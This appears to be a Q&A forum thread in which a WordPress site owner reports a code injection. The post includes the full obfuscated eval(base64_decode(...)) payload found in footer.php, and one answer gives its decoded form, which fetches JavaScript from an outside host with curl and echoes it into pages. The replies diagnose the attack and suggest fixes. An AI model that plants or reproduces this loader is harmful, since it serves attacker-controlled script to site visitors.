# Malicious injection: serkey.php and eval() in application files

Tags: php, wordpress, security, code-injection

My server has been a victim to a code injection attack.

This morning, I've found a malicious file `serkey.php` at the root of my Wordpress project. On top of that, `footer.php` had an `eval()` injected into it that looked like this:

`eval(base64_decode(ZXZhbCh...));`

The attack cincided with another developer uploading some old Drupal files to the server, but it affected the Wordpress site in question, so I'm not sure if these are related.

Have you ever been affected by an attack like this? I'm especially interested in learning what might have been possible backdoors for such an attack so that I can understand this attack better and fix the security hole.

**Edit**

Full `eval()`"

```
<?php error_reporting(0); eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUmxSc2FHbFNla1pOVldwR2RtVkdiSFJOVlRsT1VqQmFXVlF4YUZkWFZURnpWMVJDV2xadGFGQlVWV1JQVGxadmVVNVdjRTVOVm04eFYxZDBXazVYVGtoVGJsSnBVa1ZLVEZwV1pEQmtNVVY1V2toT1QwMUZOWFZaVkVKM1V6Rk9SMWRxVmxwaE1EVkRWREZXYzFKR1RuUlBWM1JVVW10dmVsWkVTbkpPUjFKMFVtNVNVMkZyY0dGV01GcExZekZyZVUxSVpHeFNXR2d4VlZkd1QxUlZNWFZSYlRsaFVucEdSMXBITVVka1ZrcHhVbTFHV0ZKWE9IaFdSVnBUVW0xU1ZrNVlRazlUU0VKT1dXeFNSMlF4YkhSaGVrWnFWakEwTVZVeFVtdFNSbTk1WkVWMFZHRXlVbEJaYWtKelVsVXhTRnBHY0U1TlZtOHhWMWQwV2s1WFRraFRibEpwVWtWS1RWVlVTbnBOTVVWNVdraEtWR0V6UWtwV1Z6VkRZVlpaZUZkcVNtRlNiV2hUVjJwR1ExWkdSbFZTYkVKclRXcHNURlZVUm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwaFJWWlhZa1p3VEZaR1dsSmxSa1p6Vm14c1RsWnNjRlZXYTFaUFRUSkZlVlZzYkZSaWF6Vk5WbXRvVDFSR1JYaFNiazVvWWxaS1dsVXlOVTlY.VlRCM1RsaE9ZVkpYVFRGYVJFcFRVa1p2ZVdSR2NFNWlWMUkyVmxaU1IxWXhWWGhWYTFwUVZtdGFXRlZ0Y0hOV1JsWnpWMnhPVjJKR1dubFViRnBYVm0xRmQxZHNRbGRXUlVwb1ZXMTRWMk5IVVhwaFJYaFhVMFUxVFZWVVJrZGpNa1owVld4c1ZHSnJOVnBVVkVFeFl6RndSbGw2Vm10TmJFcEZWMnBLTUZkck1YUmFTSEJXVmtWYVdGWlVSbE5TYXpsWFVteGtVMkZ0ZUVaV2ExSkNUVlpSZUZOc1dsVmlSbHBZVld4a05GUXhWbk5XVkZaWC5Za1p3UlZwRVNqQmhNVWw1WlVSQ1dHSkhUVEZVVm1SVFVrZEdObHBGVW1GTmJsSk1WVEowYTFVeVJraFZhMmhUVmpKU1VsWlVRa3RqVm5CSFlVVjBhazFYWkRWV2JYQlRXVlpaZDAxWVdsUmhNbEpRV1dwQ01GWlhUWGRrUlZKV1ZqTm9lRmRyV205VE1rMTRXak5zVldKck5YQlVWRUV4WXpGTmQxUnNUbWhpVlZwRldWaHdhMUpHYjNsa1JYUllZa2RTVUZscVNrdE9Wa1pZWWtWMFUwMVZjSFpYYTFaclVtMUdWazlVVG1sTlNFSjBWbFpqTkdORmRGVmplV3R3VDNjcEtUcykpOw)); ?>
```

Comment: could you post full `eval(..` in your question ?

Comment: Delete site. Restore from backup. Patch

Answer (score 2):

If you want to know what it is doing, here is the code,

```
error_reporting(0);
if(function_exists('curl_init'))
{
    $url = "http://javaterm1.pw/java/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";
}
```

It is including javascript to your code from the link in `$url`, open the link and select `View page source` to see the javascript and try to understand what it is doing.

There is a big room of possibilities for this, like using malicious wordpress themes, using older version of PHP, taking input form user and using it direcly to process.

While you try to understand the javascript, it might take time, so do as @Dagon suggested.

Comment: Thanks Viral. There is a lot of minified JS code that is not really readable. I'd  really like to learn how this attack was performed.

Comment: there are many possibilities, see my edited answer, if i can figure out i'll post here what the js is doing.

Answer (score 2):

The problem is the injection of code by one of your plugins.

I had the same problem and found that the code is injected and when analyzing the code found that this has occurred to many users even to some users who runs their wordpress in localhost.

So the only possibility of this code injection is through plugins. Check all your plugins. Is all of the plugins you use are trusted and good one.

Remove any suspicious plugins you have and also change all your server and admin passwords for safety reasons.